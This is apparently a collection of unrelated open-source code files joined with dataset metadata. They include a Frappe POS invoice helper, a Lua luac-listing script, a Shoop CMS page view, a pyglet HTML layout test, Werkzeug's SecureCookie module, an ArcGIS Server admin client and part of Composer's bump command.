customer_doc.save(ignore_permissions = True)
frappe.db.commit()
doc['customer'] = customer_doc.name
def validate_item(doc):
for item in doc.get('items'):
if not frappe.db.exists('Item', item.get('item_code')):
item_doc = frappe.new_doc('Item')
item_doc.name = item.get('item_code')
item_doc.item_code = item.get('item_code')
item_doc.item_name = item.get('item_name')
item_doc.description = item.get('description')
item_doc.default_warehouse = item.get('warehouse')
item_doc.stock_uom = item.get('stock_uom')
item_doc.item_group = item.get('item_group')
item_doc.save(ignore_permissions=True)
frappe.db.commit()
def submit_invoice(si_doc, name):
try:
si_doc.insert()
si_doc.submit()
except Exception, e:
if frappe.message_log: frappe.message_log.pop()
frappe.db.rollback()
save_invoice(e, si_doc, name)
def save_invoice(e, si_doc, name):
if not frappe.db.exists('Sales Invoice', {'offline_pos_name': name}):
si_doc.docstatus = 0
si_doc.flags.ignore_mandatory = True
si_doc.insert()
frappe.log_error(frappe.get_traceback())
|
unknown
|
codeparrot/codeparrot-clean
| ||
-- reads luac listings and reports global variable usage
-- lines where a global is written to are marked with "*"
-- typical usage: luac -p -l file.lua | lua globals.lua | sort | lua table.lua
while 1 do
local s=io.read()
if s==nil then break end
local ok,_,l,op,g=string.find(s,"%[%-?(%d*)%]%s*([GS])ETGLOBAL.-;%s+(.*)$")
if ok then
if op=="S" then op="*" else op="" end
io.write(g,"\t",l,op,"\n")
end
end
|
unknown
|
github
|
https://github.com/redis/redis
|
deps/lua/test/globals.lua
|
# -*- coding: utf-8 -*-
# This file is part of Shoop.
#
# Copyright (c) 2012-2015, Shoop Ltd. All rights reserved.
#
# This source code is licensed under the AGPLv3 license found in the
# LICENSE file in the root directory of this source tree.
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http.response import HttpResponseRedirect
from django.utils.translation import get_language
from django.views.generic.detail import DetailView
from shoop.simple_cms.models import Page
class PageView(DetailView):
model = Page
slug_field = "translations__url"
slug_url_kwarg = "url"
template_name = "shoop/simple_cms/page.jinja"
context_object_name = "page"
def get(self, request, *args, **kwargs):
"""
Override normal get method to return correct page based on the active language and slug
Cases:
1. Page is not found: `raise Http404()` like django would
2. No translation in active language for the page: `raise Http404()`
3. Translation was found for active language, but the url doesn't match given url:
`return HttpResponseRedirect` to the active languages url
4. If none of the upper matches: render page normally
"""
# get currently active language
self.object = self.get_object()
if not self.object.has_translation(get_language()):
# Page hasn't been translated into the current language; that's always a 404
raise Http404()
self.object.set_current_language(get_language())
if self.object.url != self.kwargs[self.slug_url_kwarg]: # Wrong URL, hm!
return HttpResponseRedirect(reverse('shoop:cms_page', kwargs={"url": self.object.url}))
context = self.get_context_data(object=self.object)
return self.render_to_response(context)
def get_queryset(self):
if self.request.user.is_superuser:
# Superusers may see all pages despite their visibility status
return self.model.objects.all()
return self.model.objects.visible()
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
'''Test that HTML data is decoded into a formatted document.
Press ESC to exit the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: ELEMENT.py 1764 2008-02-16 05:24:46Z Alex.Holkner $'
import unittest
import pyglet
from pyglet.text import caret, document, layout
doctext = '''
<html>
<head>
(metadata including title is not displayed.)
<title>Test document</title>
</head>
<body>
<h1>HTML test document</h1>
<p>Several paragraphs of HTML formatted text follow. Ensure they are
formatted as they are described. Here is a copyright symbol: © and
again, using hexadecimal ref: ©.</p>
<P>This paragraph has some <b>bold</b> and <i>italic</i> and <b><i>bold
italic</b> text. <!-- i tag does not need to be closed -->
<p>This paragraph has some <em>emphasis</em> and <strong>strong</strong>
and <em><strong>emphatic strong</em> text.
<p>This paragraph demonstrates superscript: a<sup>2</sup> + b<sup>2</sup>
= c<sup>2</sup>; and subscript: H<sub>2</sub>O.
<p>This paragraph uses the <font> element:
<font face="Courier New">Courier New</font>, <font size=1>size 1</font>,
<font size=2>size 2</font>, <font size=3>size 3</font>, <font size=4>size
4</font>, <font size=5>size 5</font>, <font size=6>size 6</font>, <font
size=7>size 7</font>.
<p>This paragraph uses relative sizes: <font size=5>size 5<font
size=-2>size 3</font><!--<font size=+1>size 6</font>--></font>
<p>Font color changes to <font color=red>red</font>, <font
color=green>green</font> and <font color=#0f0fff>pastel blue using a
hexidecimal number</font>.
<p><u>This text is underlined</u>. <font color=green><u>This text is
underlined and green.</u></font>
<h1>Heading 1
<h2>Heading 2
<h3>Heading 3
<h4>Heading 4
<h5>Heading 5
<h6>Heading 6
<p align=center>Centered paragraph.
<p align=right>Right-aligned paragraph.
<div><div> element instead of paragraph.
<div>This sentence should start a new paragraph, as the div is nested.
</div>
This sentence should start a new paragraph, as the nested div was
closed.
</div>
<pre>This text is preformatted.
Hard line breaks
Indentation. <b>Inline formatting</b> is still ok.</pre>
<p>This paragraph<br>
has a<br>
line break<br>
after every<br>
two words.</p>
<blockquote>This paragraph is blockquote. Lorem ipsum dolor sit amet,
consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore
et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation
ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure
dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat
nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in
culpa qui officia deserunt mollit anim id est laborum.
<blockquote>Nested blockquote. Lorem ipsum dolor sit amet,
consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore
et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation
ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure
dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat
nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in
culpa qui officia deserunt mollit anim id est laborum.</blockquote>
</blockquote>
Here is a quotation. The previous paragraph mentioned, <q>Lorem ipsum
dolor sit amet, ...</q>.
<ul>
<li>
Unordered list, level 1. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut labore et
dolore magna aliqua. Ut enim ad minim veniam, quis nostrud
exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat.
<li>
Item 2. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut labore et
dolore magna aliqua. Ut enim ad minim veniam, quis nostrud
exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat.
<li>
Item 3. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut labore et
dolore magna aliqua. Ut enim ad minim veniam, quis nostrud
exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat.
<ul>
<li>
A nested list. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut
labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip
ex ea commodo consequat.
<li>
Item 3.2. Lorem ipsum dolor sit amet, consectetur
adipisicing elit, sed do eiusmod tempor incididunt ut
labore et dolore magna aliqua.
</ul>
</ul>
<ul type="circle">
<li>Unordered list with circle bullets.
<li>Item 2.
</ul>
<ul type="square">
<li>Unordered list with square bullets.
<li>Item 2.
</ul>
<ol>
<li>Numbered list.
<li>Item 2.
<li>Item 3.
<li value=10>Item 10
<li>Item 11
</ol>
<ol start=12>
<li>Numbered list starting at 12.
<li>Item 13.
</ol>
<ol type="a">
<li>Numbered list with "a" type
<li>Item 2
<li>Item 3
</ol>
<ol type="A">
<li>Numbered list with "A" type
<li>Item 2
<li>Item 3
</ol>
<ol type="i">
<li>Numbered list with "i" type
<li>Item 2
<li>Item 3
</ol>
<ol type="I">
<li>Numbered list with "I" type
<li>Item 2
<li>Item 3
</ol>
Here's a definition list:
<dl>
<dt>Term</dt>
<dd>Definition.</dd>
<dt>Term</dt>
<dd>Definition.</dd>
<dt>Term</dt>
<dd>Definition.</dd>
</dl>
</body>
</html>
'''
class TestWindow(pyglet.window.Window):
def __init__(self, *args, **kwargs):
super(TestWindow, self).__init__(*args, **kwargs)
self.batch = pyglet.graphics.Batch()
self.document = pyglet.text.decode_html(doctext)
self.margin = 2
self.layout = layout.IncrementalTextLayout(self.document,
self.width - self.margin * 2, self.height - self.margin * 2,
multiline=True,
batch=self.batch)
self.caret = caret.Caret(self.layout)
self.push_handlers(self.caret)
self.set_mouse_cursor(self.get_system_mouse_cursor('text'))
def on_resize(self, width, height):
super(TestWindow, self).on_resize(width, height)
self.layout.begin_update()
self.layout.x = self.margin
self.layout.y = self.margin
self.layout.width = width - self.margin * 2
self.layout.height = height - self.margin * 2
self.layout.end_update()
def on_mouse_scroll(self, x, y, scroll_x, scroll_y):
self.layout.view_x -= scroll_x
self.layout.view_y += scroll_y * 16
def on_draw(self):
pyglet.gl.glClearColor(1, 1, 1, 1)
self.clear()
self.batch.draw()
def on_key_press(self, symbol, modifiers):
super(TestWindow, self).on_key_press(symbol, modifiers)
if symbol == pyglet.window.key.TAB:
self.caret.on_text('\t')
class TestCase(unittest.TestCase):
def test(self):
self.window = TestWindow(resizable=True, visible=False)
self.window.set_visible()
pyglet.app.run()
if __name__ == '__main__':
unittest.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
r"""
werkzeug.contrib.securecookie
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module implements a cookie that is not alterable from the client
because it adds a checksum the server checks for. You can use it as
session replacement if all you have is a user id or something to mark
a logged in user.
Keep in mind that the data is still readable from the client as a
normal cookie is. However you don't have to store and flush the
sessions you have at the server.
Example usage:
>>> from werkzeug.contrib.securecookie import SecureCookie
>>> x = SecureCookie({"foo": 42, "baz": (1, 2, 3)}, "deadbeef")
Dumping into a string so that one can store it in a cookie:
>>> value = x.serialize()
Loading from that string again:
>>> x = SecureCookie.unserialize(value, "deadbeef")
>>> x["baz"]
(1, 2, 3)
If someone modifies the cookie and the checksum is wrong the unserialize
method will fail silently and return a new empty `SecureCookie` object.
Keep in mind that the values will be visible in the cookie so do not
store data in a cookie you don't want the user to see.
Application Integration
=======================
If you are using the werkzeug request objects you could integrate the
secure cookie into your application like this::
from werkzeug.utils import cached_property
from werkzeug.wrappers import BaseRequest
from werkzeug.contrib.securecookie import SecureCookie
# don't use this key but a different one; you could just use
# os.urandom(20) to get something random
SECRET_KEY = '\xfa\xdd\xb8z\xae\xe0}4\x8b\xea'
class Request(BaseRequest):
@cached_property
def client_session(self):
data = self.cookies.get('session_data')
if not data:
return SecureCookie(secret_key=SECRET_KEY)
return SecureCookie.unserialize(data, SECRET_KEY)
def application(environ, start_response):
request = Request(environ)
# get a response object here
response = ...
if request.client_session.should_save:
session_data = request.client_session.serialize()
response.set_cookie('session_data', session_data,
httponly=True)
return response(environ, start_response)
A less verbose integration can be achieved by using shorthand methods::
class Request(BaseRequest):
@cached_property
def client_session(self):
return SecureCookie.load_cookie(self, secret_key=COOKIE_SECRET)
def application(environ, start_response):
request = Request(environ)
# get a response object here
response = ...
request.client_session.save_cookie(response)
return response(environ, start_response)
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import pickle
import base64
from hmac import new as hmac
from time import time
from hashlib import sha1 as _default_hash
from werkzeug._compat import iteritems, text_type
from werkzeug.urls import url_quote_plus, url_unquote_plus
from werkzeug._internal import _date_to_unix
from werkzeug.contrib.sessions import ModificationTrackingDict
from werkzeug.security import safe_str_cmp
from werkzeug._compat import to_native
class UnquoteError(Exception):
"""Internal exception used to signal failures on quoting."""
class SecureCookie(ModificationTrackingDict):
"""Represents a secure cookie. You can subclass this class and provide
an alternative mac method. The import thing is that the mac method
is a function with a similar interface to the hashlib. Required
methods are update() and digest().
Example usage:
>>> x = SecureCookie({"foo": 42, "baz": (1, 2, 3)}, "deadbeef")
>>> x["foo"]
42
>>> x["baz"]
(1, 2, 3)
>>> x["blafasel"] = 23
>>> x.should_save
True
:param data: the initial data. Either a dict, list of tuples or `None`.
:param secret_key: the secret key. If not set `None` or not specified
it has to be set before :meth:`serialize` is called.
:param new: The initial value of the `new` flag.
"""
#: The hash method to use. This has to be a module with a new function
#: or a function that creates a hashlib object. Such as `hashlib.md5`
#: Subclasses can override this attribute. The default hash is sha1.
#: Make sure to wrap this in staticmethod() if you store an arbitrary
#: function there such as hashlib.sha1 which might be implemented
#: as a function.
hash_method = staticmethod(_default_hash)
#: the module used for serialization. Unless overriden by subclasses
#: the standard pickle module is used.
serialization_method = pickle
#: if the contents should be base64 quoted. This can be disabled if the
#: serialization process returns cookie safe strings only.
quote_base64 = True
def __init__(self, data=None, secret_key=None, new=True):
ModificationTrackingDict.__init__(self, data or ())
# explicitly convert it into a bytestring because python 2.6
# no longer performs an implicit string conversion on hmac
if secret_key is not None:
secret_key = bytes(secret_key)
self.secret_key = secret_key
self.new = new
def __repr__(self):
return '<%s %s%s>' % (
self.__class__.__name__,
dict.__repr__(self),
self.should_save and '*' or ''
)
@property
def should_save(self):
"""True if the session should be saved. By default this is only true
for :attr:`modified` cookies, not :attr:`new`.
"""
return self.modified
@classmethod
def quote(cls, value):
"""Quote the value for the cookie. This can be any object supported
by :attr:`serialization_method`.
:param value: the value to quote.
"""
if cls.serialization_method is not None:
value = cls.serialization_method.dumps(value)
if cls.quote_base64:
value = b''.join(base64.b64encode(value).splitlines()).strip()
return value
@classmethod
def unquote(cls, value):
"""Unquote the value for the cookie. If unquoting does not work a
:exc:`UnquoteError` is raised.
:param value: the value to unquote.
"""
try:
if cls.quote_base64:
value = base64.b64decode(value)
if cls.serialization_method is not None:
value = cls.serialization_method.loads(value)
return value
except Exception:
# unfortunately pickle and other serialization modules can
# cause pretty every error here. if we get one we catch it
# and convert it into an UnquoteError
raise UnquoteError()
def serialize(self, expires=None):
"""Serialize the secure cookie into a string.
If expires is provided, the session will be automatically invalidated
after expiration when you unseralize it. This provides better
protection against session cookie theft.
:param expires: an optional expiration date for the cookie (a
:class:`datetime.datetime` object)
"""
if self.secret_key is None:
raise RuntimeError('no secret key defined')
if expires:
self['_expires'] = _date_to_unix(expires)
result = []
mac = hmac(self.secret_key, None, self.hash_method)
for key, value in sorted(self.items()):
result.append(('%s=%s' % (
url_quote_plus(key),
self.quote(value).decode('ascii')
)).encode('ascii'))
mac.update(b'|' + result[-1])
return b'?'.join([
base64.b64encode(mac.digest()).strip(),
b'&'.join(result)
])
@classmethod
def unserialize(cls, string, secret_key):
"""Load the secure cookie from a serialized string.
:param string: the cookie value to unserialize.
:param secret_key: the secret key used to serialize the cookie.
:return: a new :class:`SecureCookie`.
"""
if isinstance(string, text_type):
string = string.encode('utf-8', 'replace')
if isinstance(secret_key, text_type):
secret_key = secret_key.encode('utf-8', 'replace')
try:
base64_hash, data = string.split(b'?', 1)
except (ValueError, IndexError):
items = ()
else:
items = {}
mac = hmac(secret_key, None, cls.hash_method)
for item in data.split(b'&'):
mac.update(b'|' + item)
if b'=' not in item:
items = None
break
key, value = item.split(b'=', 1)
# try to make the key a string
key = url_unquote_plus(key.decode('ascii'))
try:
key = to_native(key)
except UnicodeError:
pass
items[key] = value
# no parsing error and the mac looks okay, we can now
# sercurely unpickle our cookie.
try:
client_hash = base64.b64decode(base64_hash)
except TypeError:
items = client_hash = None
if items is not None and safe_str_cmp(client_hash, mac.digest()):
try:
for key, value in iteritems(items):
items[key] = cls.unquote(value)
except UnquoteError:
items = ()
else:
if '_expires' in items:
if time() > items['_expires']:
items = ()
else:
del items['_expires']
else:
items = ()
return cls(items, secret_key, False)
@classmethod
def load_cookie(cls, request, key='session', secret_key=None):
"""Loads a :class:`SecureCookie` from a cookie in request. If the
cookie is not set, a new :class:`SecureCookie` instanced is
returned.
:param request: a request object that has a `cookies` attribute
which is a dict of all cookie values.
:param key: the name of the cookie.
:param secret_key: the secret key used to unquote the cookie.
Always provide the value even though it has
no default!
"""
data = request.cookies.get(key)
if not data:
return cls(secret_key=secret_key)
return cls.unserialize(data, secret_key)
def save_cookie(self, response, key='session', expires=None,
session_expires=None, max_age=None, path='/', domain=None,
secure=None, httponly=False, force=False):
"""Saves the SecureCookie in a cookie on response object. All
parameters that are not described here are forwarded directly
to :meth:`~BaseResponse.set_cookie`.
:param response: a response object that has a
:meth:`~BaseResponse.set_cookie` method.
:param key: the name of the cookie.
:param session_expires: the expiration date of the secure cookie
stored information. If this is not provided
the cookie `expires` date is used instead.
"""
if force or self.should_save:
data = self.serialize(session_expires or expires)
response.set_cookie(key, data, expires=expires, max_age=max_age,
path=path, domain=domain, secure=secure,
httponly=httponly)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Implementation of the objects for the ArcGIS Server REST
Administration API"""
import cgi
import itertools
import os.path
import urllib
import urlparse
import urllib2
from arcrest import server, GenerateToken
__all__ = ['Admin', 'Folder', 'Services', 'Service',
'Machine', 'Machines', 'SiteMachines', 'ClusterMachines',
'Directory', 'Directories',
'Clusters', 'Cluster']
class Admin(server.RestURL):
"""Represents the top level URL resource of the ArcGIS Server
Administration API"""
def __init__(self, url, username=None, password=None,
token=None, generate_token=False,
expiration=60):
url_list = list(urlparse.urlsplit(url))
if not url_list[2].endswith('/'):
url_list[2] += "/"
url = urlparse.urlunsplit(url_list)
if username is not None and password is not None:
self._pwdmgr.add_password(None,
url,
username,
password)
if token:
self.__token__ = token
elif generate_token:
self.__generateToken(url, username, password, expiration)
super(Admin, self).__init__(url)
@property
def resources(self):
return self._json_struct['resources']
@property
def currentVersion(self):
return self._json_struct['currentVersion']
@property
def clusters(self):
return self._get_subfolder("./clusters/", Clusters)
@property
def services(self):
return self._get_subfolder("./services/", Services)
@property
def machines(self):
return self._get_subfolder("./machines/", SiteMachines)
@property
def data(self):
return self._get_subfolder("./data/", Data)
@property
def uploads(self):
return self._get_subfolder('./uploads/', Uploads)
@property
def system(self):
return self._get_subfolder("./system/", System)
def createNewSite(self, username, password, configStoreConnection=None,
directories=None, cluster=None):
res = self._get_subfolder("./createNewSite",
server.JsonPostResult,
{'username': username,
'password': password,
'configStoreConnection': configStoreConnection,
'directories': directories,
'cluster': cluster})
self.__generateToken(self.url, username, password, 60)
return res
def joinSite(self, adminURL, username, password):
res = self._get_subfolder("./joinSite",
server.JsonPostResult,
{'username': username,
'password': password,
'adminURL': adminURL})
return res
def deleteSite(self):
res = self._get_subfolder("./deleteSite",
server.JsonPostResult)
self.__token__ = None
return res
def __generateToken(self, url, username, password, expiration):
token_auth = GenerateToken(url,
username,
password,
expiration)
if token_auth._json_struct.get('status', 'ok').lower() == 'error':
raise urllib2.URLError('\n'.join(
token_auth._json_struct.get(
'messages', ['Failed.'])))
self.__token__ = token_auth.token
class Data(server.RestURL):
"""Administration URL's data store -- Geodatabases and file data"""
@property
def geodatabases(self):
return self._get_subfolder("./geodatabases/", GeoDatabases)
@property
def items(self):
return self._get_subfolder("./items/", DataItems)
class GeoDatabases(server.RestURL):
"""Server's geodatabases and GDB connections"""
pass
class HasUploads(object):
def upload(self, file, description=''):
if isinstance(file, basestring):
file = open(file, 'rb')
sub = self._get_subfolder('./upload/', server.JsonResult,
{'description': description},
{'itemFile': file})
return sub._json_struct['item']
class Uploads(server.RestURL, HasUploads):
"""Uploads URL"""
pass
class DataItems(server.RestURL, HasUploads):
"""Server's data files"""
@property
def packages(self):
return self._json_struct['packages']
class Folder(server.RestURL):
@property
def folderName(self):
return self._json_struct['folderName']
@property
def description(self):
return self._json_struct['description']
@property
def serviceNames(self):
return [service['serviceName']
for service in self._json_struct['services']]
@property
def services(self):
return [self._get_subfolder("./%s.%s/" %
(servicename['serviceName'],
servicename['type']),
Service)
for servicename in self._json_struct['services']]
def __getitem__(self, itemname):
if '/' in itemname:
itemname, rest = itemname.split('/', 1)
return self[itemname][rest]
for servicename in self._json_struct['services']:
fstrings = (servicename['serviceName'].lower(),
(servicename['serviceName'] +
"." +
servicename['type']).lower())
if itemname.lower() in fstrings:
return self._get_subfolder("./%s.%s/" %
(servicename['serviceName'],
servicename['type']),
Service)
raise KeyError(itemname)
def __iter__(self):
return iter(self.services)
class Services(Folder):
def createFolder(self, folderName, description):
raise NotImplementedError("Not implemented")
@property
def folders(self):
return [self._get_subfolder("./%s/" % foldername, Folder)
for foldername in self._json_struct['folders']
if foldername != "/"]
@property
def types(self):
return_type = self._get_subfolder("./types/", server.JsonPostResult)
return return_type._json_struct['types']
def __getitem__(self, itemname):
for foldername in self._json_struct['folders']:
if foldername.lower() == itemname.lower():
return self._get_subfolder("./%s/" % foldername, Folder)
return super(Services, self).__getitem__(itemname)
def __iter__(self):
for folder in self.folders:
for service in folder.services:
yield service
for service in super(Services, self).__iter__():
yield service
class Service(server.RestURL):
@property
def name(self):
return self._json_struct['serviceName'] + "." + self._json_struct['type']
@property
def status(self):
return self._get_subfolder("./status/",
server.JsonPostResult)._json_struct
@property
def statistics(self):
return self._get_subfolder("./statistics/",
server.JsonPostResult)._json_struct
def start(self):
return self._get_subfolder("./start/",
server.JsonPostResult)._json_struct
def stop(self):
return self._get_subfolder("./stop/",
server.JsonPostResult)._json_struct
def delete(self):
return self._get_subfolder("./delete/",
server.JsonPostResult)._json_struct
class Machine(server.RestURL):
"""Base class for a single machine on a site"""
@property
def name(self):
return self._json_struct['machineName']
@property
def admin_url(self):
return self._json_struct['adminURL']
@property
def platform(self):
return self._json_struct['platform']
def start(self):
return self._get_subfolder("./start/",
server.JsonPostResult)._json_struct
def stop(self):
return self._get_subfolder("./stop/",
server.JsonPostResult)._json_struct
def unregister(self):
return self._get_subfolder("./unregister/",
server.JsonPostResult)._json_struct
class Machines(server.RestURL):
"""Base class for a list of machines, both on a Cluster and a Site"""
__post__ = True
__machines__ = Ellipsis
@property
def _machines(self):
if self.__machines__ is Ellipsis:
path_and_attribs = [(d['machineName'], d)
for d in self._json_struct['machines']]
self.__machines__ = dict(path_and_attribs)
return self.__machines__
def keys(self):
return self._machines.keys()
def __iter__(self):
return (Admin(item['adminURL'])
for item in self._machines.itervalues())
def register(self, machine_name, admin_url=None):
return self._get_subfolder("./register/",
server.JsonPostResult,
{'machineName': machine_name,
'adminURL': admin_url})._json_struct
class ClusterMachines(Machines):
"""A list of machines participating on a cluster"""
def add(self, machine_names):
if isinstance(machine_names, basestring):
machine_names = [machine_names]
responses = [self._get_subfolder("./add/", server.JsonPostResult,
{"machineNames": m})
for m in machine_names]
return responses
def remove(self, machine_names):
if isinstance(machine_names, basestring):
machine_names = [machine_names]
responses = [self._get_subfolder("./remove/", server.JsonPostResult,
{"machineNames": m})
for m in machine_names]
return responses
class SiteMachines(Machines):
"""A list of machines on a site"""
def register(self, machineName, adminURL=None):
res = self._get_subfolder("./register/", server.JsonPostResult,
{'machineName': machineName,
'adminURL': adminURL})
@property
def machines(self):
return [self._get_subfolder("./%s/" % machinename, Machine) for
machinename in self._machines]
def __getitem__(self, itemname):
assert itemname in self._machines, "Couldn't find %s" % itemname
return self._get_subfolder('./%s/' % itemname, Machine)
class Directory(server.RestURL):
__post__ = True
class Directories(server.RestURL):
__directories__ = Ellipsis
@property
def _directories(self):
path_and_attribs = [(d['physicalPath'], d)
for d in self._json_struct['directories']]
self.__directories__ = dict(path_and_attribs)
return self.__directories__
def __contains__(self, k):
return self._directories.__contains__(k)
def __getitem__(self, k):
return self._directories.__getitem__(k)
def register(self, type, path, vpath=None):
response = self._get_subfolder('./register', server.JsonPostResult,
{'directoryType': type.upper(),
'physicalPath': path,
'virtualPath': vpath})._json_struct
def unregister(self, path):
response = self._get_subfolder('./unregister', server.JsonPostResult,
{'physicalPath': path})._json_struct
class Cluster(server.JsonResult):
__post__ = True
__lazy_fetch__ = False
__cache_request__ = True
def __eq__(self, other):
if not isinstance(other, Cluster):
return False
return self._url == other._url
@property
def machineNames(self, _error=None, _success=None):
if "machineNames" in self._json_struct:
return self._json_struct["machineNames"]
@property
def machines(self):
return self._get_subfolder("./machines/", ClusterMachines)
def start(self):
return self._get_subfolder('./start/',
server.JsonPostResult)._json_struct
def stop(self):
return self._get_subfolder('./stop/',
server.JsonPostResult)._json_struct
def delete(self):
return self._get_subfolder('./delete/',
server.JsonPostResult)._json_struct
def editProtocol(self, type="TCP", tcpClusterPort=-1,
multicastAddress=10, multicastPort=-1):
if type not in ("TCP", "UDP"):
raise ValueError("Got %r. Valid choices are: TCP, UDP" % type)
res = self._get_subfolder('./editProtocol', server.JsonPostResult,
{'type': type,
'tcpClusterPort': tcpClusterPort
if type == "TCP"
else None,
'multicastAddress': multicastAddress
if type == "UDP"
else None,
'multicastPort': multicastPort
if type == "UDP"
else None})
class Clusters(server.RestURL):
__post__ = True
__directories__ = Ellipsis
__cluster_cache__ = Ellipsis
@property
def _clusters(self):
if self.__cluster_cache__ is Ellipsis:
path_and_attribs = [(d['clusterName'],
self._get_subfolder('./%s/' %d['clusterName'],
Cluster))
for d in self._json_struct['clusters']]
self.__cluster_cache__ = dict(path_and_attribs)
return self.__cluster_cache__
@property
def clusterNames(self):
return [d['clusterName'] for d in self._json_struct['clusters']]
def __contains__(self, k):
if isinstance(k, int):
return k < len(self)
return self._clusters.__contains__(k)
def __getitem__(self, k):
if isinstance(k, int):
k = self.clusterNames[k]
return self._clusters.__getitem__(k)
def __len__(self):
return len(self.clusterNames)
def create(self, clusterName, type="TCP", tcpClusterPort=-1,
multicastAddress=10, multicastPort=-1):
if type not in ("TCP", "UDP"):
raise ValueError("Got %r. Valid choices are: TCP, UDP" % type)
res = self._get_subfolder('./create', server.JsonPostResult,
{'clusterName': clusterName,
'type': type,
'tcpClusterPort': tcpClusterPort
if type == "TCP"
else None,
'multicastAddress': multicastAddress
if type == "UDP"
else None,
'multicastPort': multicastPort
if type == "UDP"
else None})
return self._get_subfolder('./%s/' % clusterName, Cluster)
|
unknown
|
codeparrot/codeparrot-clean
| ||
<?php declare(strict_types=1);
/*
* This file is part of Composer.
*
* (c) Nils Adermann <naderman@naderman.de>
* Jordi Boggiano <j.boggiano@seld.be>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Composer\Command;
use Composer\IO\IOInterface;
use Composer\Package\AliasPackage;
use Composer\Package\BasePackage;
use Composer\Package\Version\VersionBumper;
use Composer\Pcre\Preg;
use Composer\Util\Filesystem;
use Symfony\Component\Console\Input\InputInterface;
use Composer\Console\Input\InputArgument;
use Composer\Console\Input\InputOption;
use Symfony\Component\Console\Output\OutputInterface;
use Composer\Factory;
use Composer\Json\JsonFile;
use Composer\Json\JsonManipulator;
use Composer\Repository\PlatformRepository;
use Composer\Util\Silencer;
/**
* @author Jordi Boggiano <j.boggiano@seld.be>
*/
final class BumpCommand extends BaseCommand
{
private const ERROR_GENERIC = 1;
private const ERROR_LOCK_OUTDATED = 2;
use CompletionTrait;
protected function configure(): void
{
$this
->setName('bump')
->setDescription('Increases the lower limit of your composer.json requirements to the currently installed versions')
->setDefinition([
new InputArgument('packages', InputArgument::IS_ARRAY | InputArgument::OPTIONAL, 'Optional package name(s) to restrict which packages are bumped.', null, $this->suggestRootRequirement()),
new InputOption('dev-only', 'D', InputOption::VALUE_NONE, 'Only bump requirements in "require-dev".'),
new InputOption('no-dev-only', 'R', InputOption::VALUE_NONE, 'Only bump requirements in "require".'),
new InputOption('dry-run', null, InputOption::VALUE_NONE, 'Outputs the packages to bump, but will not execute anything.'),
])
->setHelp(
<<<EOT
The <info>bump</info> command increases the lower limit of your composer.json requirements
to the currently installed versions. This helps to ensure your dependencies do not
accidentally get downgraded due to some other conflict, and can slightly improve
dependency resolution performance as it limits the amount of package versions
Composer has to look at.
Running this blindly on libraries is **NOT** recommended as it will narrow down
your allowed dependencies, which may cause dependency hell for your users.
Running it with <info>--dev-only</info> on libraries may be fine however as dev requirements
are local to the library and do not affect consumers of the package.
EOT
)
;
}
/**
* @throws \Seld\JsonLint\ParsingException
*/
protected function execute(InputInterface $input, OutputInterface $output): int
{
return $this->doBump(
$this->getIO(),
$input->getOption('dev-only'),
$input->getOption('no-dev-only'),
$input->getOption('dry-run'),
$input->getArgument('packages')
);
}
/**
* @internal
* @param string[] $packagesFilter
* @throws \Seld\JsonLint\ParsingException
*/
public function doBump(
IOInterface $io,
bool $devOnly,
bool $noDevOnly,
bool $dryRun,
array $packagesFilter,
string $devOnlyFlagHint = '--dev-only'
): int {
/** @readonly */
$composerJsonPath = Factory::getComposerFile();
if (!Filesystem::isReadable($composerJsonPath)) {
$io->writeError('<error>'.$composerJsonPath.' is not readable.</error>');
return self::ERROR_GENERIC;
}
$composerJson = new JsonFile($composerJsonPath);
$contents = file_get_contents($composerJson->getPath());
if (false === $contents) {
$io->writeError('<error>'.$composerJsonPath.' is not readable.</error>');
return self::ERROR_GENERIC;
}
// check for writability by writing to the file as is_writable can not be trusted on network-mounts
// see https://github.com/composer/composer/issues/8231 and https://bugs.php.net/bug.php?id=68926
if (!is_writable($composerJsonPath) && false === Silencer::call('file_put_contents', $composerJsonPath, $contents)) {
$io->writeError('<error>'.$composerJsonPath.' is not writable.</error>');
return self::ERROR_GENERIC;
}
unset($contents);
$composer = $this->requireComposer();
$hasLockfileDisabled = !$composer->getConfig()->has('lock') || $composer->getConfig()->get('lock');
if (!$hasLockfileDisabled) {
$repo = $composer->getLocker()->getLockedRepository(true);
} elseif ($composer->getLocker()->isLocked()) {
if (!$composer->getLocker()->isFresh()) {
$io->writeError('<error>The lock file is not up to date with the latest changes in composer.json. Run the appropriate `update` to fix that before you use the `bump` command.</error>');
return self::ERROR_LOCK_OUTDATED;
}
$repo = $composer->getLocker()->getLockedRepository(true);
} else {
$repo = $composer->getRepositoryManager()->getLocalRepository();
}
if ($composer->getPackage()->getType() !== 'project' && !$devOnly) {
$io->writeError('<warning>Warning: Bumping dependency constraints is not recommended for libraries as it will narrow down your dependencies and may cause problems for your users.</warning>');
$contents = $composerJson->read();
if (!isset($contents['type'])) {
